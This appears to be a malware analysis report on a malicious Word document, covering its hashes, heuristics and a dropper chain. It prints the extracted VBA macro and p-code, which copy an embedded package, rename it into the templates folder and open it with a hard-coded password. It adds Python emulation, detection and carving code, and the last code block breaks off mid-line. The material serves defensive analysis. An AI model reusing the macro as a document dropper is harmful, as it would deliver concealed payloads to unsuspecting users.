Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 91b132ce04fb65fa…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 505.5 KB
Created: 2021-09-09 11:00:00
First seen: 2021-09-17
MD5: 3ff3aff50fedadd3722f543f940db117
SHA-1: de052d777281f73a677620d3b3cb3ddcca6f4c54
SHA-256: 91b132ce04fb65fa3b6c887ddf263f637be18b18d162932e30ede8563b16b4e0
Risk score: 72

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is an OLE (Word binary) document whose VBA project runs from Document_Open. Everything it needs is inside the file: the extracted macro contains no download, no shell or WMI execution and no registry write, so the second stage is the embedded OLE Package (Ole10Native) object, not a remote payload. On open the macro checks whether reform.doc already exists in the Word user templates folder (Options.DefaultFilePath(wdUserTemplatesPath), normally %APPDATA%\Microsoft\Templates) and does nothing if it does. Otherwise it walks the selection to a fixed offset in the body, sends a backspace and copies the selection (Selection.Copy in bvxfcsd). The Ole10Native header records the packaged file as C:\Users\MyPc\AppData\Local\Temp\reform.ioe, and %TEMP% is where Word's Packager handler materialises an embedded package when the object is activated or copied to the clipboard. The macro then locates that folder without calling Environ: it shortens the Roaming templates path one character at a time until <prefix> & "Local/Temp" names a directory (the string is assembled from single-character literals), searches that tree recursively with a FileSystemObject for reform.ioe, moves the hit to <templates>\reform.doc with the Name statement, opens it through Documents.Open with the hard-coded password 2281337, and closes the carrier document. The carved payload is 326,144 bytes with entropy 7.98, which is consistent with a password-encrypted Office file rather than plain packed code, so the clean ClamAV result on it means little until it is decrypted with that password. Useful host pivots are reform.ioe under %LOCALAPPDATA%\Temp and reform.doc in the user templates folder; the MyPc user name in the recorded path was captured when the package was built and belongs to the builder's machine, not to a victim. The EMF object in the EPRINT stream only corroborates object delivery; no exploit record is shown. The schemas.microsoft.com and schemas.openxmlformats.org URLs are XML namespace strings found in the body (the first three are the Office encryption descriptor's namespaces) and are never contacted by the macro.
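To turn the chain described above into concrete host artefacts without detonating the document, the following Python re-implements the path arithmetic of Document_Open, bvxfcsd, Search and nam over a constructed in-memory directory tree. This is an added example written for this report, not code from the sample or from oletools; the templates path and the MyPc user name are taken from the full_path recorded in the Ole10Native header, and the rest of the tree (a ~DF temp file, a Low subfolder) is an assumption. It also exercises the two cases the macro leaves unhandled: the drop not being present, and an %APPDATA% prefix longer than the 49 characters the trim loop starts from, which ends in a VBA run-time error rather than a silent exit.

```python
import ntpath


class FakeFs:
    """Constructed Windows-style directory tree: {dir: [file names]}.
    Lookups are case-insensitive and accept mixed / and \\ separators, as
    Win32 does, which is what the macro's "Local/Temp" string relies on."""

    def __init__(self, tree):
        self.dirs = {}
        for d, files in tree.items():
            self.dirs[self._key(d)] = (ntpath.normpath(d), sorted(files))

    @staticmethod
    def _key(path):
        return ntpath.normpath(path).lower()

    def is_dir(self, path):
        return self._key(path) in self.dirs

    def files_in(self, path):
        return self.dirs.get(self._key(path), ("", []))[1]

    def subdirs(self, path):
        parent = self._key(path)
        return [orig for key, (orig, _) in self.dirs.items()
                if ntpath.dirname(key) == parent]

    def full_path(self, folder, name):
        return ntpath.join(self.dirs[self._key(folder)][0], name)


def vba_left(s, n):
    """VBA Left(): a negative length is run-time error 5; a length past the end returns the whole string."""
    if n < 0:
        raise ValueError("Left(): invalid procedure call or argument (run-time error 5)")
    return s[:n]


def find_local_temp(templates_path, fs):
    """Module3.bvxfcsd: instead of Environ("TEMP"), shorten the Roaming templates path
    one character per loop turn until <prefix> & "Local/Temp" names a directory."""
    kuls = "L" + "o" + "c" + "a" + "l" + "/" + "Temp"  # assembled from fragments, as in the macro
    ntgs, sda = 50, 49
    while sda < 50:
        ntgs -= 1                                       # first probe uses Left(path, 49)
        if fs.is_dir(vba_left(templates_path, ntgs) + kuls):
            sda = 61                                    # any value >= 50 ends the loop
    return vba_left(templates_path, ntgs) + kuls, ntgs


def search(fs, folder, name, found=""):
    """Module123345.Search: depth-first, subfolders before files, ByRef result and no
    early exit, so the last match in traversal order wins. Option Compare Text makes
    the name test case-insensitive. The ErrHandle label is dead code (no On Error GoTo),
    so an access-denied folder would abort the macro."""
    for sub in fs.subdirs(folder):
        found = search(fs, sub, name, found)
    for f in fs.files_in(folder):
        if f.lower() == name.lower():
            found = fs.full_path(folder, f)             # File object's default property is .Path
    return found


def emulate_document_open(templates_path, fs):
    """ThisDocument.Document_Open: the host artefacts the chain produces on this tree."""
    out = {"templates_path": templates_path, "stage2": None, "error": None}
    if any(f.lower() == "reform.doc" for f in fs.files_in(templates_path)):
        out["skipped"] = "reform.doc already in templates folder"   # Dir(...) <> ""
        return out
    # Selection.Copy on the embedded Package object: Word's Packager writes the packaged
    # file (the full_path in the Ole10Native header) under %TEMP%. The tree assumes that.
    try:
        temp_dir, cut = find_local_temp(templates_path, fs)
    except ValueError as exc:
        out["error"] = str(exc)        # no <prefix>Local/Temp reachable: macro dies with error 5
        return out
    hdv = search(fs, temp_dir, "reform.ioe")
    out.update(temp_dir=temp_dir, prefix_len=cut, found=hdv)
    if len(hdv) > 2:
        out["stage2"] = templates_path + "\\reform.doc"   # Name hdv As pls & "\reform.doc"
        out["open_password"] = "2281337"                  # Documents.Open ... PasswordDocument:=
        out["closes_original"] = True                     # ActiveDocument.Close
    return out


TEMPLATES = r"C:\Users\MyPc\AppData\Roaming\Microsoft\Templates"   # from the report's full_path
TREE = {   # constructed: only what the chain needs, plus a sibling folder to exercise recursion
    TEMPLATES: [],
    r"C:\Users\MyPc\AppData\Local\Temp": ["~DFA1B2.tmp", "reform.ioe"],
    r"C:\Users\MyPc\AppData\Local\Temp\Low": [],
}

if __name__ == "__main__":
    for key, value in emulate_document_open(TEMPLATES, FakeFs(TREE)).items():
        print(f"{key}: {value}")
```

The prefix the loop settles on is 22 characters ("C:\Users\MyPc\AppData\"), so the probe string is C:\Users\MyPc\AppData\Local/Temp with a forward slash that Win32 path handling tolerates; a user name long enough to push that prefix past 49 characters makes the loop run Left() negative and the macro fails on the victim.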

Heuristics (5)

  • Office EPRINT stream contains EMF object (severity: high; tag: CVE related; rule: OLE_EPRINT_EMF_OBJECT)
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in benign documents and counts as Office object-delivery evidence when paired with other payload anomalies, but the malformed graphics record needed for an exact CVE attribution is not established by this rule alone. Nothing else in this report shows an exploit record, so treat the EMF object as corroboration of the embedded-object delivery, not as a vulnerability finding.
  • VBA macros detected (severity: medium; 1 related finding; rule: OLE_VBA_MACROS)
    Document contains VBA macro code.
  • Document_Open macro (severity: low; rule: OLE_VBA_DOCOPEN)
    Auto-execute entry point. Matched line in script: Private Sub Document_Open()
  • Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached each URL.
      • http://schemas.microsoft.com/office/2006/encryption (in document text, OLE body)
      • http://schemas.microsoft.com/office/2006/keyEncryptor/password (in document text, OLE body)
      • http://schemas.microsoft.com/office/2006/keyEncryptor/certificate (in document text, OLE body)
      • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    None of these is contacted by the macro. The first three are the XML namespace URIs of the Office agile-encryption EncryptionInfo descriptor, which is stored in clear text inside a password-protected Office file; finding them in the body of an unencrypted OLE carrier is consistent with the embedded Ole10Native payload being a password-encrypted Office document, which is exactly what the macro's Documents.Open with PasswordDocument:="2281337" expects. The drawingml URI is an ordinary drawing namespace.
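The rules above flag this document only generically (macros present, a Document_Open handler). The following Python is an added example, not part of the report's rule set, that does two things an analyst would otherwise do by hand on the listing further down: it constant-folds the macro's string concatenations so the assembled literals ("Local/Temp", "reform.ioe", "\reform.doc") and the Documents.Open password surface as indicators, and it scores the source against the specific drop-rename-open chain this sample implements. The MACRO constant is an excerpt of the extracted source shown in this report, trimmed to the lines the chain needs; the rule names and the five-of-eight threshold are assumptions made here.

```python
import re

# Excerpt of the decompressed macro listed in this report (trimmed to the chain's lines).
MACRO = r'''
Private Sub Document_Open()
Dim kytrewwf As String
kytrewwf = Options.DefaultFilePath(wdUserTemplatesPath)
If Dir(kytrewwf & "\reform.doc") = "" Then
    Selection.TypeBackspace
    Call bvxfcsd
    If Len(hdv) > 2 Then
        Call nam(hdv, kytrewwf)
        Call pppx(kytrewwf & "\reform.doc")
        ActiveDocument.Close
    End If
End If
End Sub
Sub pppx(spoc As String)
    Documents.Open FileName:=spoc, ConfirmConversions:=False, ReadOnly:= _
        False, AddToRecentFiles:=False, PasswordDocument:="2281337", _
        PasswordTemplate:="", Revert:=False, Format:=wdOpenFormatAuto
End Sub
Sub bvxfcsd()
Selection.Copy
Dim fafaa As String
fafaa = "L" & "o"
fafaa = fafaa & "c" & "a" & "l"
fafaa = fafaa & "/" & "Temp"
Dim kuls As String
kuls = fafaa
Call ThisDocument.hdhdd(Left(uuuuc, ntgs) & fafaa)
End Sub
Sub Search(mds As Object, pafs As String)
  fffff = "reform.ioe"
  For Each Nedc In mds.SubFolders
     Search Nedc, pafs
  Next Nedc
End Sub
Sub nam(pafs As String, aaaa As String)
oxl = "\reform.doc"
Name pafs As pls & oxl
End Sub
'''

ASSIGN = re.compile(r'^(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(.+)$')
TOKEN = re.compile(r'"((?:[^"]|"")*)"|([^&"]+)')   # a string literal, or a bare operand between & signs
PASSWORD = re.compile(r'\bPasswordDocument\s*:=\s*"([^"]*)"', re.I)

# (description, regex) pairs for the drop-rename-open chain; names and weighting are assumptions.
RULES = [
    ("auto-executes on open (Document_Open)", r"\bSub\s+Document_Open\s*\("),
    ("copies the selected embedded object (Packager drop to %TEMP%)", r"\bSelection\.Copy\b"),
    ("locates user folders via Word options, not Environ", r"\bOptions\.DefaultFilePath\s*\(\s*wdUserTemplatesPath"),
    ("walks the file system recursively", r"\bScripting\.FileSystemObject\b|\.SubFolders\b"),
    ("renames or moves a file (Name ... As)", r"^\s*Name\s+\w+\s+As\s+"),
    ("opens a document with a hard-coded password", r'\bDocuments\.Open\b[\s\S]*?\bPasswordDocument\s*:=\s*"[^"]+"'),
    ("closes the carrier document", r"\bActiveDocument\.Close\b"),
    ("builds strings from single-character fragments", r'"[^"]"\s*&\s*"[^"]"'),
]


def strip_comment(line):
    """Drop a trailing ' comment, ignoring apostrophes inside string literals."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i]
    return line


def fold_strings(vba):
    """Constant-fold assignments of the form  x = "a" & y & "b"  in program order.
    VBA names are case-insensitive, so the map is keyed in lower case. A right-hand
    side with anything other than literals and already-known string variables makes
    x unknown again, so a later reassignment from a call never keeps a stale value."""
    env = {}
    for raw in vba.splitlines():
        m = ASSIGN.match(strip_comment(raw).strip())
        if not m:
            continue
        name, rhs = m.group(1).lower(), m.group(2)
        parts, resolvable = [], True
        for tok in TOKEN.finditer(rhs):
            if tok.group(1) is not None:                     # "literal"; "" inside is an escaped quote
                parts.append(tok.group(1).replace('""', '"'))
                continue
            bare = tok.group(2).strip()
            if not bare:                                     # whitespace around &
                continue
            if bare.lower() in env:
                parts.append(env[bare.lower()])
            else:
                resolvable = False                           # number, call, object or unknown name
        if resolvable and parts:
            env[name] = "".join(parts)
        else:
            env.pop(name, None)
    return env


def triage(vba):
    """Score VBA source against the chain and return the folded indicators."""
    matched = [desc for desc, pat in RULES if re.search(pat, vba, re.I | re.M)]
    strings = fold_strings(vba)
    pw = PASSWORD.search(vba)
    return {
        "matched": matched,
        "score": len(matched),
        "verdict": "drop-rename-open chain" if len(matched) >= 5 else "generic macro",
        "strings": strings,
        "password": pw.group(1) if pw else None,
        "paths": sorted({v for v in strings.values() if "\\" in v or "/" in v or "." in v}),
    }


if __name__ == "__main__":
    for key, value in triage(MACRO).items():
        print(f"{key}: {value}")
```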

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9616 bytes
SHA-256: 36c32c520e282965c06b592dc452e8d0a67d377d911bc570a13efc4014b32eee
Preview: first 1,000 lines of the extracted script. The decompressed source of the four modules comes first, followed by the pcodedmp p-code listing of the same modules. The two do not agree on every identifier: Module3's string variable is fafaa in the source but adaaaaa in the p-code, and the second parameter of ousx and nam appears as _B_var_Call rather than aaaa. Source and p-code disagreeing is the signal VBA-stomping checks look for, and which of the two Word executes depends on whether the cached p-code matches the opening Word version, so confirm behaviour against the p-code (olevba --pcode, or pcodedmp) before relying on the source listing alone. Behaviourally both listings describe the same chain.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Option Compare Text
        Dim hdv As String
        Dim bbbb As String
        Dim med As String
Private Sub Document_Open()
Dim dfgdgdg
Dim kytrewwf As String
kytrewwf = Options.DefaultFilePath(wdUserTemplatesPath)

If Dir(kytrewwf & "\reform.doc") = "" Then
 Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2

    Selection.TypeBackspace

    Call bvxfcsd
If Len(hdv) > 2 Then
Call nam(hdv, kytrewwf)
Call pppx(kytrewwf & "\reform.doc")
ActiveDocument.Close
End If
End If
End Sub




Sub hdhdd(asda As String)
Dim MyFSO As FileSystemObject
Dim MyFile As File
Dim SourceFolder As String
Dim DestinationFolder As String
Dim MyFolder As Folder
Dim MySubFolder As Folder
Set MyFSO = New Scripting.FileSystemObject


Call Search(MyFSO.GetFolder(asda), hdv)

End Sub


Attribute VB_Name = "Module1"


Sub pppx(spoc As String)
    Documents.Open FileName:=spoc, ConfirmConversions:=False, ReadOnly:= _
        False, AddToRecentFiles:=False, PasswordDocument:="2281337", _
        PasswordTemplate:="", Revert:=False, WritePasswordDocument:="", _
        WritePasswordTemplate:="", Format:=wdOpenFormatAuto, XMLTransform:=""
End Sub



Sub ousx(aaaa As String)
Call uoia(aaaa)
End Sub



Attribute VB_Name = "Module3"

Sub bvxfcsd()
Selection.Copy
Dim uuuuc
uuuuc = Options.DefaultFilePath(wdUserTemplatesPath)

    ntgs = 50
sda = 49
Dim fafaa As String
fafaa = "L" & "o"
fafaa = fafaa & "c" & "a" & "l"
fafaa = fafaa & "/" & "Temp"
Dim kuls As String
kuls = fafaa
While sda < 50
      ntgs = ntgs - 1

      If Dir(Left(uuuuc, ntgs) & kuls, vbDirectory) = "" Then
        
    Else
  
   sda = 61
    End If

   Wend
   Call ThisDocument.hdhdd(Left(uuuuc, ntgs) & fafaa)
End Sub





Attribute VB_Name = "Module123345"
Dim pls As String


 Sub Search(mds As Object, pafs As String)
 Dim Nedc As Object
    Dim Ters As Object
  Dim fffff
  fffff = "reform.ioe"
For Each Nedc In mds.SubFolders
     Search Nedc, pafs
   Next Nedc

   For Each Ters In mds.Files
   
   If Ters.Name = fffff Then
       
        pafs = Ters
        End If
   Next Ters
   Exit Sub
ErrHandle:
   
   Err.Clear
End Sub



Sub nam(pafs As String, aaaa As String)
Call ousx(aaaa)
Dim oxl
oxl = "\reform.doc"
Name pafs As pls & oxl
End Sub

Sub uoia(fffs As String)
pls = fffs
End Sub























' Processing file: /tmp/qstore_hrz5cmks
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4719 bytes
' Line #0:
' 	Option  (Explicit)
' Line #1:
' 	Option  (Compare Text)
' Line #2:
' 	Dim 
' 	VarDefn hdv (As String)
' Line #3:
' 	Dim 
' 	VarDefn bbbb (As String)
' Line #4:
' 	Dim 
' 	VarDefn med (As String)
' Line #5:
' 	FuncDefn (Sub Document_Open())
' Line #6:
' 	Dim 
' 	VarDefn dfgdgdg
' Line #7:
' 	Dim 
' 	VarDefn kytrewwf (As String)
' Line #8:
' 	Ld wdUserTemplatesPath 
' 	Ld Options 
' 	ArgsMemLd DefaultFilePath 0x0001 
' 	St kytrewwf 
' Line #9:
' Line #10:
' 	Ld kytrewwf 
' 	LitStr 0x000B "\reform.doc"
' 	Concat 
' 	ArgsLd Dir 0x0001 
' 	LitStr 0x0000 ""
' 	Eq 
' 	IfBlock 
' Line #11:
' 	Ld wdLine 
' 	ParamNamed Unit 
' 	LitDI2 0x0003 
' 	ParamNamed Count 
' 	Ld Selection 
' 	ArgsMemCall MoveDown 0x0002 
' Line #12:
' 	Ld wdCharacter 
' 	ParamNamed Unit 
' 	LitDI2 0x0002 
' 	ParamNamed Count 
' 	Ld Selection 
' 	ArgsMemCall MoveRight 0x0002 
' Line #13:
' 	Ld wdLine 
' 	ParamNamed Unit 
' 	LitDI2 0x0003 
' 	ParamNamed Count 
' 	Ld Selection 
' 	ArgsMemCall MoveDown 0x0002 
' Line #14:
' 	Ld wdCharacter 
' 	ParamNamed Unit 
' 	LitDI2 0x0002 
' 	ParamNamed Count 
' 	Ld Selection 
' 	ArgsMemCall MoveRight 0x0002 
' Line #15:
' Line #16:
' 	Ld Selection 
' 	ArgsMemCall TypeBackspace 0x0000 
' Line #17:
' Line #18:
' 	ArgsCall (Call) bvxfcsd 0x0000 
' Line #19:
' 	Ld hdv 
' 	FnLen 
' 	LitDI2 0x0002 
' 	Gt 
' 	IfBlock 
' Line #20:
' 	Ld hdv 
' 	Ld kytrewwf 
' 	ArgsCall (Call) nam 0x0002 
' Line #21:
' 	Ld kytrewwf 
' 	LitStr 0x000B "\reform.doc"
' 	Concat 
' 	ArgsCall (Call) pppx 0x0001 
' Line #22:
' 	Ld ActiveDocument 
' 	ArgsMemCall Close 0x0000 
' Line #23:
' 	EndIfBlock 
' Line #24:
' 	EndIfBlock 
' Line #25:
' 	EndSub 
' Line #26:
' Line #27:
' Line #28:
' Line #29:
' Line #30:
' 	FuncDefn (Sub hdhdd(asda As String))
' Line #31:
' 	Dim 
' 	VarDefn MyFSO
' Line #32:
' 	Dim 
' 	VarDefn MyFile
' Line #33:
' 	Dim 
' 	VarDefn SourceFolder (As String)
' Line #34:
' 	Dim 
' 	VarDefn DestinationFolder (As String)
' Line #35:
' 	Dim 
' 	VarDefn MyFolder
' Line #36:
' 	Dim 
' 	VarDefn MySubFolder
' Line #37:
' 	SetStmt 
' 	New id_FFFF
' 	Set MyFSO 
' Line #38:
' Line #39:
' Line #40:
' 	Ld asda 
' 	Ld MyFSO 
' 	ArgsMemLd GetFolder 0x0001 
' 	Ld hdv 
' 	ArgsCall (Call) Search 0x0002 
' Line #41:
' Line #42:
' 	EndSub 
' Line #43:
' Macros/VBA/Module1 - 3236 bytes
' Line #0:
' Line #1:
' Line #2:
' 	FuncDefn (Sub pppx(spoc As String))
' Line #3:
' 	LineCont 0x000C 0D 00 08 00 17 00 08 00 23 00 08 00
' 	Ld spoc 
' 	ParamNamed FileName 
' 	LitVarSpecial (False)
' 	ParamNamed ConfirmConversions 
' 	LitVarSpecial (False)
' 	ParamNamed ReadOnly 
' 	LitVarSpecial (False)
' 	ParamNamed AddToRecentFiles 
' 	LitStr 0x0007 "2281337"
' 	ParamNamed PasswordDocument 
' 	LitStr 0x0000 ""
' 	ParamNamed PasswordTemplate 
' 	LitVarSpecial (False)
' 	ParamNamed Revert 
' 	LitStr 0x0000 ""
' 	ParamNamed WritePasswordDocument 
' 	LitStr 0x0000 ""
' 	ParamNamed WritePasswordTemplate 
' 	Ld wdOpenFormatAuto 
' 	ParamNamed Format 
' 	LitStr 0x0000 ""
' 	ParamNamed XMLTransform 
' 	Ld Documents 
' 	ArgsMemCall Open 0x000B 
' Line #4:
' 	EndSub 
' Line #5:
' Line #6:
' Line #7:
' Line #8:
' 	FuncDefn (Sub ousx(_B_var_Call As String))
' Line #9:
' 	Ld _B_var_Call 
' 	ArgsCall (Call) uoia 0x0001 
' Line #10:
' 	EndSub 
' Line #11:
' Line #12:
' Macros/VBA/Module3 - 3109 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Sub bvxfcsd())
' Line #2:
' 	Ld Selection 
' 	ArgsMemCall Copy 0x0000 
' Line #3:
' 	Dim 
' 	VarDefn uuuuc
' Line #4:
' 	Ld wdUserTemplatesPath 
' 	Ld Options 
' 	ArgsMemLd DefaultFilePath 0x0001 
' 	St uuuuc 
' Line #5:
' Line #6:
' 	LitDI2 0x0032 
' 	St ntgs 
' Line #7:
' 	LitDI2 0x0031 
' 	St sda 
' Line #8:
' 	Dim 
' 	VarDefn adaaaaa (As String)
' Line #9:
' 	LitStr 0x0001 "L"
' 	LitStr 0x0001 "o"
' 	Concat 
' 	St adaaaaa 
' Line #10:
' 	Ld adaaaaa 
' 	LitStr 0x0001 "c"
' 	Concat 
' 	LitStr 0x0001 "a"
' 	Concat 
' 	LitStr 0x0001 "l"
' 	Concat 
' 	St adaaaaa 
' Line #11:
' 	Ld adaaaaa 
' 	LitStr 0x0001 "/"
' 	Concat 
' 	LitStr 0x0004 "Temp"
' 	Concat 
' 	St adaaaaa 
' Line #12:
' 	Dim 
' 	VarDefn kuls (As String)
' Line #13:
' 	Ld adaaaaa 
' 	St kuls 
' Line #14:
' 	Ld sda 
' 	LitDI2 0x0032 
' 	Lt 
' 	While 
' Line #15:
' 	Ld ntgs 
' 	LitDI2 0x0001 
' 	Sub 
' 	St ntgs 
' Line #16:
' Line #17:
' 	Ld uuuuc 
' 	Ld ntgs 
' 	ArgsLd Left 0x0002 
' 	Ld kuls 
' 	Concat 
' 	Ld vbDirectory 
' 	ArgsLd Dir 0x0002 
' 	LitStr 0x0000 ""
' 	Eq 
' 	IfBlock 
' Line #18:
' Line #19:
' 	ElseBlock 
' Line #20:
' Line #21:
' 	LitDI2 0x003D 
' 	St sda 
' Line #22:
' 	EndIfBlock 
' Line #23:
' Line #24:
' 	Wend 
' Line #25:
' 	Ld uuuuc 
' 	Ld ntgs 
' 	ArgsLd Left 0x0002 
' 	Ld adaaaaa 
' 	Concat 
' 	Ld ThisDocument 
' 	ArgsMemCall (Call) hdhdd 0x0001 
' Line #26:
' 	EndSub 
' Line #27:
' Line #28:
' Line #29:
' Line #30:
' Macros/VBA/Module123345 - 3995 bytes
' Line #0:
' 	Dim 
' 	VarDefn pls (As String)
' Line #1:
' Line #2:
' Line #3:
' 	FuncDefn (Sub Search(mds As Object))
' Line #4:
' 	Dim 
' 	VarDefn Nedc (As Object)
' Line #5:
' 	Dim 
' 	VarDefn Ters (As Object)
' Line #6:
' 	Dim 
' 	VarDefn fffff
' Line #7:
' 	LitStr 0x000A "reform.ioe"
' 	St fffff 
' Line #8:
' 	StartForVariable 
' 	Ld Nedc 
' 	EndForVariable 
' 	Ld mds 
' 	MemLd SubFolders 
' 	ForEach 
' Line #9:
' 	Ld Nedc 
' 	Ld pafs 
' 	ArgsCall Search 0x0002 
' Line #10:
' 	StartForVariable 
' 	Ld Nedc 
' 	EndForVariable 
' 	NextVar 
' Line #11:
' Line #12:
' 	StartForVariable 
' 	Ld Ters 
' 	EndForVariable 
' 	Ld mds 
' 	MemLd Files 
' 	ForEach 
' Line #13:
' Line #14:
' 	Ld Ters 
' 	MemLd Name 
' 	Ld fffff 
' 	Eq 
' 	IfBlock 
' Line #15:
' Line #16:
' 	Ld Ters 
' 	St pafs 
' Line #17:
' 	EndIfBlock 
' Line #18:
' 	StartForVariable 
' 	Ld Ters 
' 	EndForVariable 
' 	NextVar 
' Line #19:
' 	ExitSub 
' Line #20:
' 	Label ErrHandle 
' Line #21:
' Line #22:
' 	Ld Err 
' 	ArgsMemCall Clear 0x0000 
' Line #23:
' 	EndSub 
' Line #24:
' Line #25:
' Line #26:
' Line #27:
' 	FuncDefn (Sub nam(pafs As String))
' Line #28:
' 	Ld _B_var_Call 
' 	ArgsCall (Call) ousx 0x0001 
' Line #29:
' 	Dim 
' 	VarDefn oxl
' Line #30:
' 	LitStr 0x000B "\reform.doc"
' 	St oxl 
' Line #31:
' 	Ld pafs 
' 	Ld pls 
' 	Ld oxl 
' 	Concat 
' 	Name 
' Line #32:
' 	EndSub 
' Line #33:
' Line #34:
' 	FuncDefn (Sub uoia(fffs As String))
' Line #35:
' 	Ld fffs 
' 	St pls 
' Line #36:
' 	EndSub 
' Line #37:
' Line #38:
' Line #39:
' Line #40:
' Line #41:
' Line #42:
' Line #43:
' Line #44:
' Line #45:
' Line #46:
' Line #47:
' Line #48:
' Line #49:
' Line #50:
' Line #51:
' Line #52:
' Line #53:
' Line #54:
' Line #55:
' Line #56:
' Line #57:
' Line #58:
Filename: ole10native_00.bin
Kind: ole-package
Source: OLE Ole10Native stream ObjectPool/_1692664209/Ole10Native
Size: 326465 bytes
SHA-256: 63c60a7c6df8e0b4a03e0c06987ee880d01b22586db5d74308b3d4efb6479685
Detection: ClamAV: No threats found
Obfuscation or payload: likely. Carved artifact entropy is 7.98, consistent with packed or encrypted content.

Filename: ole10native_00_reform.ioe
Kind: ole-package-payload
Source: OLE Ole10Native payload of ObjectPool/_1692664209/Ole10Native (display_name=reform.ioe; full_path=C:\Users\MyPc\AppData\Local\Temp\reform.ioe; temp_path=; def_file=; the last two fields are empty in the header)
Size: 326144 bytes
SHA-256: 36a58872bd4b8226e007fe9fe9cb2b99da1bab76245e77877746a8fffc9f4585
Detection: ClamAV: No threats found
Obfuscation or payload: likely. Carved artifact entropy is 7.98, consistent with packed or encrypted content.

The 321-byte difference between the stream and the payload is the Packager header and trailer (size, flags, label, original path, temp path, payload length). The full_path is the location of the file on the machine that built the package, recorded at insertion time; it is an author artefact, not a victim path. A clean ClamAV verdict on this payload carries little weight: the macro opens it with PasswordDocument:="2281337", and the Office encryption namespace URIs found in the carrier body point to an agile-encrypted Office document, which a scanner sees only as high-entropy ciphertext. Decrypt it with that password (msoffcrypto-tool handles Office encryption) and re-triage the plaintext, which is where the actual second stage, and any further macros or objects, will be.
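The two artefacts above are the raw Ole10Native stream and the file carved out of it. The Python below is an added example, not the analysis pipeline's own carver, that parses the Packager header in the field order oletools' oleobj uses, carves the payload, and produces the fields reported above (size, SHA-256, entropy and the packed/encrypted verdict), refusing a stream whose declared payload runs past its end. The demo stream is constructed in memory with a deterministic high-entropy filler standing in for reform.ioe, so it runs offline; carve_from_file applies the same function to a real document through olefile, an assumed optional dependency.

```python
import hashlib
import math
import struct
from collections import Counter


def parse_ole10native(stream: bytes) -> dict:
    """Parse a Packager (Ole10Native) stream in the field order oletools' oleobj reads:
    uint32 size, uint16 flags, label\\0, original full path\\0, two uint32 of
    undocumented meaning, temp path\\0, uint32 payload size, payload, then a
    trailer (ignored here). Raises ValueError on a truncated header or payload."""
    try:
        declared, flags = struct.unpack_from("<IH", stream, 0)
        pos = 6

        def cstring(at):
            end = stream.find(b"\x00", at)
            if end < 0:
                raise ValueError("unterminated string in Ole10Native header")
            return stream[at:end].decode("latin-1"), end + 1

        label, pos = cstring(pos)
        full_path, pos = cstring(pos)
        pos += 8                                     # skip the two undocumented uint32s
        temp_path, pos = cstring(pos)
        (size,) = struct.unpack_from("<I", stream, pos)
        pos += 4
    except struct.error as exc:
        raise ValueError(f"truncated Ole10Native header: {exc}") from None
    if pos + size > len(stream):
        raise ValueError(f"declared payload {size} bytes, only {len(stream) - pos} present")
    return {"declared_size": declared, "flags": flags, "label": label,
            "full_path": full_path, "temp_path": temp_path,
            "payload": stream[pos:pos + size]}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 8.0 is uniform random, 7.9 and above means packed or encrypted."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def triage_payload(stream: bytes, packed_threshold: float = 7.5) -> dict:
    """Carve the packaged file and produce the report's fields for it."""
    info = parse_ole10native(stream)
    payload = info.pop("payload")
    entropy = round(shannon_entropy(payload), 2)
    info.update(
        size=len(payload),
        sha256=hashlib.sha256(payload).hexdigest(),
        entropy=entropy,
        verdict=("packed or encrypted content likely" if entropy >= packed_threshold
                 else "low entropy, inspect as plain data"),
        # Path recorded when the object was inserted, i.e. on the builder's machine.
        author_drop_dir=info["full_path"].rsplit("\\", 1)[0],
    )
    return info


def is_well_formed(stream: bytes) -> bool:
    """True when the header parses and the declared payload is fully present."""
    try:
        parse_ole10native(stream)
        return True
    except ValueError:
        return False


def build_ole10native(label: str, full_path: str, payload: bytes,
                      temp_path: str = "", flags: int = 2) -> bytes:
    """Constructed stream in the same layout, for the offline demo (not from the sample)."""
    def cstr(s):
        return s.encode("latin-1") + b"\x00"
    body = (struct.pack("<H", flags) + cstr(label) + cstr(full_path)
            + struct.pack("<II", 0, len(temp_path) + 1) + cstr(temp_path)
            + struct.pack("<I", len(payload)) + payload)
    return struct.pack("<I", len(body)) + body


def demo_payload(blocks: int = 1024) -> bytes:
    """Deterministic high-entropy filler standing in for the 326,144-byte reform.ioe."""
    return b"".join(hashlib.sha256(b"reform.ioe" + i.to_bytes(4, "little")).digest()
                    for i in range(blocks))


def carve_from_file(path: str) -> list:
    """Same triage over every Ole10Native stream of a real file; needs `pip install olefile`."""
    import olefile  # assumed optional dependency, not used by the offline demo
    results = []
    with olefile.OleFileIO(path) as ole:
        for entry in ole.listdir(streams=True):
            if entry[-1].lstrip("\x01").lower() == "ole10native":
                info = triage_payload(ole.openstream(entry).read())
                info["stream"] = "/".join(entry)
                results.append(info)
    return results


if __name__ == "__main__":
    demo = build_ole10native("reform.ioe",
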